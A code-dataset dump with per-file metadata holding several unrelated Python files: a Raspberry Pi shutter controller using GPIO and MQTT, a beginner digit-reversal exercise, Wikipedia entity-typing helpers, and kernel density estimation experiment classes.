| 44.803419 | 112 | 0.643457 | 657 | 5,242 | 4.951294 | 0.179604 | 0.096834 | 0.077467 | 0.06763 | 0.580695 | 0.455579 | 0.376268 | 0.301568 | 0.27882 | 0.226253 | 0 | 0.018764 | 0.237505 | 5,242 | 116 | 113 | 45.189655 | 0.795096 | 0.033766 | 0 | 0.244898 | 0 | 0 | 0.016206 | 0 | 0 | 0 | 0 | 0 | 0.285714 | 1 | 0.091837 | false | 0 | 0.071429 | 0 | 0.204082 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9cb773294b5f9609161513dcd00107f097b6bbc0 | 4,974 | py | Python | shutter.py | devgiants/home-automation-items | c516e344d24649746af501d46b88fc1bc0ab3368 | [
"MIT"
] | null | null | null | shutter.py | devgiants/home-automation-items | c516e344d24649746af501d46b88fc1bc0ab3368 | [
"MIT"
] | null | null | null | shutter.py | devgiants/home-automation-items | c516e344d24649746af501d46b88fc1bc0ab3368 | [
"MIT"
] | null | null | null | #!/usr/bin/python3
import logging
import sys
import threading
from gpiozero import LED, Button
from signal import pause
class Shutter:
UP = 'open'
DOWN = 'close'
STOP = 'stop'
name = None
logger = None
buttonUp = None
buttonDown = None
relayUp = None
relayDown = None
timeout = None
timer = None
mqttClient = None
mqttTopicToListen = None
mqttTopicToReport = None
def registerGpi(self, buttonUpPinNumber, buttonDownPinNumber):
self.buttonUp = Button(buttonUpPinNumber)
self.buttonDown = Button(buttonDownPinNumber)
self.logger.debug(
'Link GPI {}:{}, {}:{}'.format(
'button up', buttonUpPinNumber,
'button down', buttonDownPinNumber
)
)
self.buttonUp.when_pressed = lambda button: self.__upManualAction(button)
self.buttonDown.when_pressed = lambda button: self.__downManualAction(button)
self.buttonUp.when_released = lambda button: self.__stopManualAction(button)
self.buttonDown.when_released = lambda button: self.__stopManualAction(button)
def registerMqtt(self, client, mqttTopicToListen, mqttTopicToReport):
self.mqttClient = client
self.mqttTopicToListen = mqttTopicToListen
self.mqttTopicToReport = mqttTopicToReport
self.mqttSubscribe()
self.logger.debug('Register MQTT topic listening on topic {} (feedback {})'.format(self.mqttTopicToListen, self.mqttTopicToReport))
def mqttSubscribe(self):
self.mqttClient.subscribe(self.mqttTopicToListen)
self.mqttClient.message_callback_add(self.mqttTopicToListen, self.__handleMqttMessage)
def __init__(self, name, relayUpPinNumber, relayDownPinNumber, timeout = 30):
self.name = name
self.relayUp = LED(relayUpPinNumber, False)
self.relayDown = LED(relayDownPinNumber, False)
self.timeout = timeout
self.__initLogger()
self.logger.debug(
'Create shutter with {}:{}, {}:{}'.format(
'relay up', relayUpPinNumber,
'relay down', relayDownPinNumber
)
)
def __initLogger(self):
print(self.name)
self.logger = logging.getLogger(self.name)
self.logger.setLevel(logging.DEBUG)
handler = logging.StreamHandler(sys.stdout)
handler.setLevel(logging.DEBUG)
formatter = logging.Formatter('[%(asctime)s] [{}] [%(name)s] %(levelname)s %(message)s'.format(__name__), datefmt='%d-%m-%Y %H:%M:%S')
handler.setFormatter(formatter)
self.logger.addHandler(handler)
def __stopManualAction(self, buttonReleased):
self.__stop()
self.logger.debug('Manual stop (pin {})'.format(buttonReleased.pin))
def __stopTimerAction(self):
self.logger.debug('Timer stop')
self.__stop()
def __stopMqttAction(self):
self.logger.debug('MQTT stop')
self.__stop()
def __stop(self):
self.relayDown.off()
self.relayUp.off()
self.__sendFeedback(self.STOP)
if type(self.timer) == threading.Timer:
self.timer.cancel()
def __upManualAction(self, buttonUp):
self.logger.debug('Manual up (pin {})'.format(buttonUp.pin))
self.__up()
def __upMqttAction(self):
self.logger.debug('MQTT up')
self.__up()
def __up(self):
self.relayUp.on()
self.relayDown.off()
self.__sendFeedback(self.UP)
self.__startTimer()
def __downManualAction(self, buttonDown):
self.logger.debug('Manual down (pin {})'.format(buttonDown.pin))
self.__down()
def __downMqttAction(self):
self.logger.debug('MQTT down')
self.__down()
def __down(self):
self.relayUp.off()
self.relayDown.on()
self.__sendFeedback(self.DOWN)
self.__startTimer()
def __startTimer(self):
self.logger.debug('Start timer for {}s'.format(self.timeout))
self.timer = threading.Timer(self.timeout, self.__stopTimerAction)
self.timer.start()
def __handleMqttMessage(self, client, userdata, message):
if message.topic == self.mqttTopicToListen:
payloadDecoded = message.payload.decode("utf-8")
if payloadDecoded == self.UP:
self.__upMqttAction()
if payloadDecoded == self.DOWN:
self.__downMqttAction()
if payloadDecoded == self.STOP:
self.__stopMqttAction()
def __sendFeedback(self, message):
self.logger.debug('Send feedback on {}:{}'.format(self.mqttTopicToReport, message))
self.mqttClient.publish(self.mqttTopicToReport, message) | 34.068493 | 146 | 0.608162 | 466 | 4,974 | 6.306867 | 0.238197 | 0.051038 | 0.061245 | 0.032324 | 0.09425 | 0.034025 | 0.034025 | 0 | 0 | 0 | 0 | 0.001123 | 0.283876 | 4,974 | 146 | 147 | 34.068493 | 0.823975 | 0.003418 | 0 | 0.12931 | 0 | 0 | 0.074642 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.155172 | false | 0 | 0.043103 | 0 | 0.327586 | 0.008621 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9cb8db803f38715facca07d97b74c472e6e12272 | 416 | py | Python | py_ws/sep_while.py | hjhan/python-for-kids | 51d8cb3361fc7b7c4fb0a714670498450611d219 | [
"MIT"
] | null | null | null | py_ws/sep_while.py | hjhan/python-for-kids | 51d8cb3361fc7b7c4fb0a714670498450611d219 | [
"MIT"
] | null | null | null | py_ws/sep_while.py | hjhan/python-for-kids | 51d8cb3361fc7b7c4fb0a714670498450611d219 | [
"MIT"
] | null | null | null | # print("请输入一个正整数:", end=' ')
n = int(input("请输入一个正整数:"))
i = 0
digits = [] # 列表 list
while (n >= 10 ** i):
# digit = int(n % 10 ** (i + 1) / 10 ** i)
digit = n % 10 ** (i + 1) // 10 ** i # 取出每一位数字
#digits.insert(0, digit)
digits.append(digit)
i += 1
print("每位为%s" % digits)
len = len(digits)
sum = 0
for i in range(len):
sum += digits[i] * 10 ** (len - i - 1)
print(sum)
| 23.111111 | 52 | 0.478365 | 64 | 416 | 3.109375 | 0.390625 | 0.075377 | 0.060302 | 0.050251 | 0.080402 | 0.080402 | 0 | 0 | 0 | 0 | 0 | 0.065517 | 0.302885 | 416 | 17 | 53 | 24.470588 | 0.62069 | 0.257212 | 0 | 0 | 0 | 0 | 0.048951 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.153846 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9cbc945a0d3063f43ad61663e0acc93e00ed41c0 | 6,742 | py | Python | src/HAnDS/helper.py | abhipec/hands | ff9658d4226c78b96c02ccf3b91b7d2699f0e4cf | [
"MIT"
] | 13 | 2019-05-02T01:44:04.000Z | 2022-02-21T13:39:47.000Z | src/HAnDS/helper.py | abhipec/hands | ff9658d4226c78b96c02ccf3b91b7d2699f0e4cf | [
"MIT"
] | 1 | 2021-06-01T13:04:51.000Z | 2021-06-08T16:07:35.000Z | src/HAnDS/helper.py | abhipec/hands | ff9658d4226c78b96c02ccf3b91b7d2699f0e4cf | [
"MIT"
] | 1 | 2019-12-26T07:24:03.000Z | 2019-12-26T07:24:03.000Z | """
Contains various helper function related to CADS framework.
"""
import os
import errno
import pickle
from nameparser import HumanName
#pylint:disable=raising-bad-type
def ensure_directory(directory):
"""
Create the directories along the provided directory path that do not exist.
"""
directory = os.path.expanduser(directory)
try:
os.makedirs(directory)
except OSError as exception:
if exception.errno != errno.EEXIST:
raise exception
#pylint:enable=raising-bad-type
def prepare_dictionaries(master_dictionary_path, mapping_file):
"""
Load necessary dictionary.
"""
md = pickle.load(open(master_dictionary_path, 'rb'))#pylint:disable=invalid-name
#pylint:enable=invalid-name
redirect_to_title = {}
surface_names_to_titles = {}
for title in md:
for redirect in md[title]['alternate_titles']:
redirect_to_title[redirect] = title
if 'surface_names' in md[title]:
for name in md[title]['surface_names']:
if name not in surface_names_to_titles:
surface_names_to_titles[name] = set()
surface_names_to_titles[name].add(title)
mapping = {}
with open(mapping_file) as file_p:
for row in filter(None, file_p.read().split('\n')):
if len(row.split('\t')) == 2:
fb_label, figer_label = row.split('\t')
mapping[fb_label] = figer_label
else:
mapping[row] = row
return {
'md' : md,
'rtt' : redirect_to_title,
'sntt' : surface_names_to_titles,
'lmap' : mapping
}
def get_actual_title(link, dictionaries):
"""
Return actual title of wiki page link if exists.
"""
if link not in dictionaries['md']:
if link not in dictionaries['rtt']:
link = None
else:
link = dictionaries['rtt'][link]
return link
def map_labels(labels, mapping):
"""
Map a list of labels with dictionary values if present,
"""
mapped_labels = set()
for label in [mapping[x] for x in labels if mapping.get(x, 0)]:
mapped_labels.add(label)
return mapped_labels
def lowercase_support_confidence(link, dictionaries):
"""
Compute support and confidence of lowercase surface names.
"""
link = get_actual_title(link, dictionaries)
surface_names = dictionaries['md'][link]['surface_names']
lower_case_count = 0
total = 0
for name in surface_names:
if name.islower():
lower_case_count += surface_names[name]
total += surface_names[name]
return lower_case_count, (lower_case_count / total) * 100
def is_title_entity(link, dictionaries):
"""
Return status of link.
0 : Not entity
1 : Entity
-1 : Couldn't infer. Discard.
"""
link = get_actual_title(link, dictionaries)
if not link:
return -1
labels = dictionaries['md'][link]['labels']
mapped_labels = map_labels(labels, dictionaries['lmap'])
if mapped_labels:
return 1
# A special case
if '/government/political_ideology' in labels:
return 0
try:
support, confidence = lowercase_support_confidence(link, dictionaries)
except KeyError:
return -1
if support > 50 and confidence > 50:
return 0
return -1
def parse_title(title, dictionaries):
"""
Parse a Wikipedia page title or redirect.
"""
correct_names = set()
label_set = set(dictionaries['md'][get_actual_title(title, dictionaries)].get('labels', ''))
title = title.replace('_', ' ')
# remove part of title that are in round brackets. Eg. Rice (novel)
filtered_title = title[:title.find('(')].strip() if '(' in title else title
# if first character is '(', then do not remove round brackets
if not filtered_title:
filtered_title = title
correct_names.add(filtered_title)
correct_names.add(filtered_title.lower())
# If type person, add first and last name
if '/people/person' in label_set and '/organization' not in label_set\
and '/location' not in label_set:
name = HumanName(filtered_title)
correct_names.add(name.first)
correct_names.add(name.last)
return correct_names
def generate_candidate_names(title, dictionaries):
"""
Return a set of possible referent names of a Wikipedia title.
"""
names = set()
names.update(parse_title(title, dictionaries))
# add redirect names
for redirect in dictionaries['md'][title]['alternate_titles']:
names.update(parse_title(redirect, dictionaries))
return set(filter(None, names))
def is_surface_name_referential(name, link, dictionaries):
"""
Returns true, if the surface name matches with the candidate names.
"""
title = get_actual_title(link, dictionaries)
candidate_names = generate_candidate_names(title, dictionaries)
if name in candidate_names or name.lower() in candidate_names:
return True
return False
def separate_links(link_set, dictionaries):
"""
Partition link_set into entity and non entity set.
"""
entities = set()
non_entities = set()
discard_entities = set()
for link in link_set:
status = is_title_entity(link, dictionaries)
if status == 1:
entities.add(get_actual_title(link, dictionaries))
elif status == 0:
non_entities.add(get_actual_title(link, dictionaries))
else:
discard_entities.add(link)
return (entities, non_entities, discard_entities)
def is_entity_lowercase_dominant(link, dictionaries):
"""
Return true if in more than 50% surface names,
entity in expressed as lowercase words.
"""
try:
names = dictionaries['md'][get_actual_title(link, dictionaries)]['surface_names']
except KeyError:
# print(link)
return False
total = 0
lowercase = 0
for name in names:
if name.islower():
lowercase += names[name]
total += names[name]
if (lowercase / total) > 0.5:
return True
return False
def return_mapped_labels(link, dictionaries):
"""
Return label set assigned by KB.
"""
title = get_actual_title(link, dictionaries)
if title is None:
return set()
labels = dictionaries['md'][title].get('labels', set())
mapped_labels = map_labels(labels, dictionaries['lmap'])
return mapped_labels
def return_parent_label(label):
"""
Example:
Input: /education/department
Output: /education
"""
if label.count('/') > 1:
return label[0:label.find('/', 1)]
return label
| 29.831858 | 96 | 0.641946 | 831 | 6,742 | 5.043321 | 0.220217 | 0.061083 | 0.030064 | 0.034359 | 0.211644 | 0.101408 | 0.060129 | 0 | 0 | 0 | 0 | 0.006181 | 0.256155 | 6,742 | 225 | 97 | 29.964444 | 0.829511 | 0.171611 | 0 | 0.212766 | 0 | 0 | 0.04169 | 0.005609 | 0 | 0 | 0 | 0 | 0 | 1 | 0.092199 | false | 0 | 0.028369 | 0 | 0.276596 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
9cbd9e49ae6c4d9c717ce04a992db53d48888f0a | 17,459 | py | Python | design.py | tvanzyl/adaptive_bandwidth_kde | 8aef713b78705ac3192bf5eb6b42b93b3611d8dc | [
"MIT"
] | null | null | null | design.py | tvanzyl/adaptive_bandwidth_kde | 8aef713b78705ac3192bf5eb6b42b93b3611d8dc | [
"MIT"
] | null | null | null | design.py | tvanzyl/adaptive_bandwidth_kde | 8aef713b78705ac3192bf5eb6b42b93b3611d8dc | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""
Created on Mon Jun 6 16:59:19 2016
@author: tvzyl
"""
import data
from sklearn.datasets import make_spd_matrix
from pandas import DataFrame
from numpy import mean, diag, eye, rot90, dot, array, abs
from numpy import zeros, ones, arange
from numpy.random import uniform
from scipy.stats import entropy
from sklearn.utils.extmath import cartesian
from sklearn.neighbors import KDTree
class Experiment():
def __init__(self, n_training, n_test, dimensions, actualsEstimator, name):
self.__name__ = name
self.n_training = n_training
self.n_test = n_test
self.dimensions = dimensions
self.actualsEstimator = actualsEstimator.fit()
self.train = DataFrame( self.actualsEstimator.sample(self.n_training) )
self.importance_test = DataFrame( self.actualsEstimator.sample(self.n_test) )
self.lows = self.train.min(axis=0)
self.highs = self.train.max(axis=0)
self.uniform_test = DataFrame( uniform(low=self.lows, high=self.highs, size=(self.n_test,self.dimensions)) )
self.importance_actuals = self.actualsEstimator.predict(self.importance_test)
self.uniform_actuals = self.actualsEstimator.predict(self.uniform_test)
self.test = self.importance_test
self.test_actuals = self.importance_actuals
#Build up a KDTRee for faster processing
self.kdt_ = KDTree(self.train, leaf_size=30, metric='euclidean')
self.dist_, self.nn_ = self.kdt_.query(self.test, k=int(1+self.n_test**0.5), return_distance=True)
self.dist_loo_, self.nn_loo_ = self.kdt_.query(self.train, k=int(1+self.n_training**0.5), return_distance=True)
def ISE(self, estimates, actuals):
r"""
.. math:: Q_N(e,a,p) = \frac{1}{N}\sum_{i=0}^N\frac{(e_i-a_i)^2}{p_i}
Integrated Squared Error with Importance Sampling
"""
return mean(((estimates - actuals)**2.))**0.5
def IAE(self, estimates, actuals):
r"""
.. math:: Q_N(e,a,p) = \frac{1}{N}\sum_{i=0}^N\frac{|e_i-a_i|}{p_i}
Integrated Absolute Error with Importance Sampling
"""
return mean(abs(estimates - actuals))
def EmpericalEntropy(self, estimates):
return entropy(estimates, base=2)
def JensenShannon(self, estimates, actuals):
M = 0.5*(estimates+actuals)
return 0.5*(entropy(estimates,M, base=2) + entropy(actuals,M, base=2))
def KullbackLeiber(self, estimates, actuals):
return entropy(actuals, estimates, base=2)
def getResults(self, estimator, prekdt=False):
# uni_est = estimator.predict(self.uniform_test)
#Attach some pre calculated results to the estimator
if prekdt:
estimator.nn_ = self.nn_
estimator.dist_ = self.dist_
estimator.nn_loo_ = self.nn_loo_
estimator.dist_loo_ = self.dist_loo_
estimator.kdt_ = self.kdt_
est = estimator.predict(self.test)
actuals = self.test_actuals
estimator.nn_ = None
estimator.dist_ = None
estimator.nn_loo_ = None
estimator.dist_loo_ = None
estimator.kdt_ = None
return self.ISE(est, actuals), self.IAE(est, actuals), self.JensenShannon(est, actuals), self.KullbackLeiber(est, actuals), self.EmpericalEntropy(est)
class BlobExperiment(Experiment):
def __init__(self, n_training, n_test, means, covs, ratios=None, name='BlobExperiment'):
self.means = array(means)
self.covs = array(covs)
self.ratios = ratios
dimensions = self.means.shape[1]
actualsEstimator = data.TrueBlobDensity(self.means, self.covs, self.ratios).fit()
Experiment.__init__(self, n_training, n_test, dimensions, actualsEstimator, name=name)
def getSIGMA(self, std1,std2,rho):
return dot(array([[std1,std2]]).T,array([[std1,std2]])) * (rot90(diag([rho,rho]))+eye(2))
def getSIGMA_N(self, std,rho):
n=len(std)
return dot(array([std]).T,array([std])) * (rho*(1-eye(n))+eye(n))
class BallExperiment(Experiment):
def __init__(self, n_training, n_test, mean=[0,0], cov=0.5, inner_trials=10, name='ballExperiment'):
self.mean = array(mean)
self.cov = cov
self.inner_trials = inner_trials
dimensions = self.mean.shape[0]
actualsEstimator = data.TrueBallDensity(self.mean, self.cov, self.inner_trials).fit()
Experiment.__init__(self, n_training, n_test, dimensions, actualsEstimator, name=name)
class EllipsoidExperiment(Experiment):
def __init__(self, n_training, n_test, radii=[3,2,1], cov=0.05, name='ballExperiment'):
self.radii = array(radii)
self.cov = cov
dimensions = self.radii.shape[0]
actualsEstimator = data.TrueEllipsoidDensity(self.radii, self.cov).fit()
Experiment.__init__(self, n_training, n_test, dimensions, actualsEstimator, name=name)
class Experiment1(BlobExperiment):
r"""
Bimodal J
Density H, A [1, 2].
References
----------
[1] Wand, M.P. and Jones, M.C., 1993. Comparison of smoothing parameterizations in bivariate kernel density estimation. Journal of the American Statistical Association, 88(422), pp.520-528. http://www.jstor.org/stable/pdf/2290332.pdf
[2] Zhang, X., King, M.L. and Hyndman, R.J., 2006. A Bayesian approach to bandwidth selection for multivariate kernel density estimation. Computational Statistics & Data Analysis, 50(11), pp.3009-3031.
"""
def __init__(self, n_training=200, n_test=2000):
self.dimensions=2
self.modes=2
mu_1 = [ 2.0, 2.0]
mu_2 = [-1.5,-1.5]
sigma_1 = [[1.0,-0.9],[-0.9,1.0]]
sigma_2 = [[1.0, 0.3],[ 0.3,1.0]]
BlobExperiment.__init__(self, n_training, n_test, [mu_1,mu_2], [sigma_1,sigma_2],
None, "e1_n(%s)_d(%s)_mode(%s)"%(n_training,self.dimensions,2))
class Experiment2(BlobExperiment):
r"""
Skewed
Density C, #2, [1, 2, 3].
References
----------
[1] Wand, M.P. and Jones, M.C., 1993. Comparison of smoothing parameterizations in bivariate kernel density estimation. Journal of the American Statistical Association, 88(422), pp.520-528. http://www.jstor.org/stable/pdf/2290332.pdf
[2] Wu, T.J., Chen, C.F. and Chen, H.Y., 2007. A variable bandwidth selector in multivariate kernel density estimation. Statistics & probability letters, 77(4), pp.462-467. http://www.stat.ncku.edu.tw/faculty_private/tjwu/varbandnew.pdf
[3] Sain, S.R., 2002. Multivariate locally adaptive density estimation. Computational Statistics & Data Analysis, 39(2), pp.165-186. http://private.igf.edu.pl/~jnn/Literatura_tematu/Sain_2002.pdf
"""
def __init__(self, n_training=200, n_test=2000):
self.dimensions=2
self.modes=3
mu_1 = [0.0, 0.0]
mu_2 = [0.5, 0.5]
mu_3 = [13./12.,13/12.]
sigma_1 = diag([1, 1])
sigma_2 = diag([2./3.,2./3.])**2
sigma_3 = diag([5./9.,5./9.])**2
ratios = [0.2,0.2,0.6]
BlobExperiment.__init__(self, n_training, n_test, [mu_1,mu_2, mu_3], [sigma_1,sigma_2,sigma_3],
ratios, "e2_n(%s)_d(%s)_mode(%s)"%(n_training,self.dimensions,3))
class Experiment3(BlobExperiment):
r"""
Trimodal Gavel
Density I, D, F4, #7 [1,2,3,4].
References
----------
[1] Wand, M.P. and Jones, M.C., 1993. Comparison of smoothing parameterizations in bivariate kernel density estimation. Journal of the American Statistical Association, 88(422), pp.520-528. http://www.jstor.org/stable/pdf/2290332.pdf
[2] de Lima, M.S. and Atuncar, G.S., 2011. A Bayesian method to estimate the optimal bandwidth for multivariate kernel estimator. Journal of Nonparametric Statistics, 23(1), pp.137-148. http://www.tandfonline.com/doi/pdf/10.1080/10485252.2010.485200
[3] Zougab, N., Adjabi, S. and Kokonendji, C.C., 2014. Bayesian estimation of adaptive bandwidth matrices in multivariate kernel density estimation. Computational Statistics & Data Analysis, 75, pp.28-38. http://www.sciencedirect.com/science/article/pii/S0167947314000322
[4] Wu, T.J., Chen, C.F. and Chen, H.Y., 2007. A variable bandwidth selector in multivariate kernel density estimation. Statistics & probability letters, 77(4), pp.462-467. http://www.stat.ncku.edu.tw/faculty_private/tjwu/varbandnew.pdf
"""
def __init__(self, n_training=200, n_test=2000):
self.dimensions = 2
self.modes=3
mu_1 = [-6./5., 6./5.]
mu_2 = [6./5., -6./5.]
mu_3 = [0.,0.]
sigma_1 = self.getSIGMA(3./5.,3./5.,3./10.)
sigma_2 = self.getSIGMA(3./5.,3./5.,-3./5.)
sigma_3 = self.getSIGMA(1./4.,1./4.,1./5.)
ratios = [9./20.,9./20.,2./20.]
BlobExperiment.__init__(self, n_training, n_test, [mu_1,mu_2, mu_3], [sigma_1,sigma_2,sigma_3],
ratios, "e3_n(%s)_d(%s)_mode(%s)"%(n_training,self.dimensions,3))
class Experiment4(BlobExperiment):
r"""
Trimodal :math:`\lambda`
Density K, ,F3 [1,2,3].
References
----------
[1] Wand, M.P. and Jones, M.C., 1993. Comparison of smoothing parameterizations in bivariate kernel density estimation. Journal of the American Statistical Association, 88(422), pp.520-528. http://www.jstor.org/stable/pdf/2290332.pdf
[2] Sain, S.R., 2002. Multivariate locally adaptive density estimation. Computational Statistics & Data Analysis, 39(2), pp.165-186. http://private.igf.edu.pl/~jnn/Literatura_tematu/Sain_2002.pdf
[3] Zougab, N., Adjabi, S. and Kokonendji, C.C., 2014. Bayesian estimation of adaptive bandwidth matrices in multivariate kernel density estimation. Computational Statistics & Data Analysis, 75, pp.28-38. http://www.sciencedirect.com/science/article/pii/S0167947314000322
"""
def __init__(self, n_training=200, n_test=2000):
self.dimensions = 2
self.modes=3
mu_1 = [-1., 0.]
mu_2 = [ 1., 3**0.5*2./3.]
mu_3 = [ 1., -3**0.5*2./3.]
sigma_1 = self.getSIGMA(3./5.,7./10.,3./5.)
sigma_2 = self.getSIGMA(3./5.,7./10.,0. )
sigma_3 = self.getSIGMA(3./5.,7./10.,0.)
ratios = [3./7.,3./7.,1./7.]
BlobExperiment.__init__(self, n_training, n_test, [mu_1,mu_2, mu_3], [sigma_1,sigma_2,sigma_3],
ratios, "e4_n(%s)_d(%s)_mode(%s)"%(n_training,self.dimensions,3))
class Experiment5(BlobExperiment):
r"""
Bimodal T
Density F2, C [1,2].
References
----------
[1] Zougab, N., Adjabi, S. and Kokonendji, C.C., 2014. Bayesian estimation of adaptive bandwidth matrices in multivariate kernel density estimation. Computational Statistics & Data Analysis, 75, pp.28-38. http://www.sciencedirect.com/science/article/pii/S0167947314000322
[2] de Lima, M.S. and Atuncar, G.S., 2011. A Bayesian method to estimate the optimal bandwidth for multivariate kernel estimator. Journal of Nonparametric Statistics, 23(1), pp.137-148. http://www.tandfonline.com/doi/pdf/10.1080/10485252.2010.485200
"""
def __init__(self, n_training=200, n_test=2000):
self.dimensions=2
self.modes=2
mu_1 = [ 1., 1.]
mu_2 = [-1., -1.]
sigma_1 = self.getSIGMA(1.,1., 0.5)
sigma_2 = self.getSIGMA(1.,1.,-0.5)
BlobExperiment.__init__(self, n_training, n_test, [mu_1,mu_2], [sigma_1,sigma_2],
None, "e5_n(%s)_d(%s)_mode(%s)"%(n_training,self.dimensions,2))
class Experiment6(BlobExperiment):
r"""
Unimodal ND
Density F5, F7, _, _ [1,2].
References
----------
[1] Zougab, N., Adjabi, S. and Kokonendji, C.C., 2014. Bayesian estimation of adaptive bandwidth matrices in multivariate kernel density estimation. Computational Statistics & Data Analysis, 75, pp.28-38. http://www.sciencedirect.com/science/article/pii/S0167947314000322
[2] Duong, T. and Hazelton, M.L., 2005. Cross‐validation Bandwidth Matrices for Multivariate Kernel Density Estimation. Scandinavian Journal of Statistics, 32(3), pp.485-506. http://onlinelibrary.wiley.com/doi/10.1111/j.1467-9469.2005.00445.x/pdf
"""
def __init__(self, dimensions=3, n_training=300, n_test=2000):
self.dimensions=dimensions
self.modes=1
mu_1 = zeros(self.dimensions)
sigma_1 = self.getSIGMA_N(ones(self.dimensions), 0.9)
BlobExperiment.__init__(self, n_training, n_test, [mu_1], [sigma_1],
None, "e6_n(%s)_d(%s)_mode(%s)"%(n_training,self.dimensions,1))
class Experiment7(BlobExperiment):
r"""
Bimodal ND
Density F6, F7, G [1,2].
References
----------
[1] Zougab, N., Adjabi, S. and Kokonendji, C.C., 2014. Bayesian estimation of adaptive bandwidth matrices in multivariate kernel density estimation. Computational Statistics & Data Analysis, 75, pp.28-38. http://www.sciencedirect.com/science/article/pii/S0167947314000322
[2] de Lima, M.S. and Atuncar, G.S., 2011. A Bayesian method to estimate the optimal bandwidth for multivariate kernel estimator. Journal of Nonparametric Statistics, 23(1), pp.137-148. http://www.tandfonline.com/doi/pdf/10.1080/10485252.2010.485200
"""
def __init__(self, dimensions=3, n_training=300, n_test=2000):
self.dimensions=dimensions
self.modes=2
d = self.dimensions
mu_1 = ones(self.dimensions)*4. # [4., 4., 4.]
mu_2 = ones(self.dimensions)*4. #[1., 1., 1.]
rho = 0.9
c = cartesian([arange(d), arange(d)] )
exp = abs(c[:,0]-c[:,1]).reshape((d,d))
sigma_1 = (ones((d,d))*rho)**exp
#sigma_1 = [[1., rho,rho**2],
# [rho, 1., rho ],
# [rho**2,rho,1. ]]
sigma_1 = array(sigma_1)/(1-rho**(d-1))
rho = 0.7
sigma_2 = (ones((d,d))*rho)**exp
#sigma_2 = [[1., rho,rho**2],
# [rho, 1., rho ],
# [rho**2,rho,1. ]]
sigma_2 = array(sigma_2)/(1-rho**(d-1))
BlobExperiment.__init__(self, n_training, n_test, [mu_1,mu_2], [sigma_1,sigma_2],
None, "e7_n(%s)_d(%s)_mode(%s)"%(n_training,self.dimensions,2))
class Experiment8(BlobExperiment):
r"""
Bimodal 4D
Density F8, H [1,2].
References
----------
[1] Zougab, N., Adjabi, S. and Kokonendji, C.C., 2014. Bayesian estimation of adaptive bandwidth matrices in multivariate kernel density estimation. Computational Statistics & Data Analysis, 75, pp.28-38. http://www.sciencedirect.com/science/article/pii/S0167947314000322
[2] de Lima, M.S. and Atuncar, G.S., 2011. A Bayesian method to estimate the optimal bandwidth for multivariate kernel estimator. Journal of Nonparametric Statistics, 23(1), pp.137-148. http://www.tandfonline.com/doi/pdf/10.1080/10485252.2010.485200
"""
def __init__(self, n_training=400, n_test=2000):
self.dimensions=4
self.modes=2
mu_1 = [1., 1., 1., 1.]
mu_2 = [-1., -1., -1., -1.]
sigma_1 = self.getSIGMA_N([1.,1.,1.,1.], 0.6)
sigma_2 = [[1.0,0.5,0.7,0.5],
[0.5,1.0,0.5,0.7],
[0.7,0.5,1.0,0.5],
[0.5,0.7,0.5,1.0]]
BlobExperiment.__init__(self, n_training, n_test, [mu_1,mu_2], [sigma_1,sigma_2],
None, "e8_n(%s)_d(%s)_mode(%s)"%(n_training,self.dimensions,2))
class ExperimentE(EllipsoidExperiment):
r"""
Infmodal ND
"""
def __init__(self, dimensions=2, n_training=200, n_test=2000):
self.dimensions = dimensions
self.modes=0
radii = arange(dimensions,0,-1)
cov=0.05
#sigma_inner = diag(ones(dimensions)*0.2)
EllipsoidExperiment.__init__(self, n_training, n_test, radii, cov,
"eE_n(%s)_d(%s)_mode(inf)"%(n_training,self.dimensions))
class ExperimentC(BallExperiment):
r"""
Infmodal ND
"""
def __init__(self, dimensions=2, n_training=200, n_test=2000):
self.dimensions = dimensions
mean = zeros(dimensions)
cov = diag(arange(0.9,0.1,-0.8/self.dimensions))
#sigma_inner = diag(ones(dimensions)*0.2)
BallExperiment.__init__(self, n_training, n_test, mean, cov,
10, "eC_n(%s)_d(%s)_mode(inf)"%(n_training,self.dimensions))
class ExperimentD(BlobExperiment):
r"""
Random M Modal ND
"""
def __init__(self, modes=1, dimensions=2, n_training=200, n_test=2000):
self.dimensions = dimensions
self.modes = modes
mu_s = []
sigma_s = []
for i in range(modes):
sigma_i = make_spd_matrix(self.dimensions)
#std = diag(sigma_i)**0.5
#rho = (sigma_i/outer(std,std))
#sigma_i = outer((std/std.max()/self.modes), (std/std.max()/self.modes)) * rho
sigma_s.append(sigma_i)
low = -0.5
high = 0.5
mu_s.append(uniform(low=low, high=high, size=(self.dimensions)) )
ratios = uniform(high=1./modes, size=(modes))
ratios[:] = 1./modes #ratios.sum()
BlobExperiment.__init__(self, n_training, n_test, mu_s, sigma_s,
ratios, "eD_n(%s)_d(%s)_mode(%s)"%(n_training,self.dimensions,self.modes))
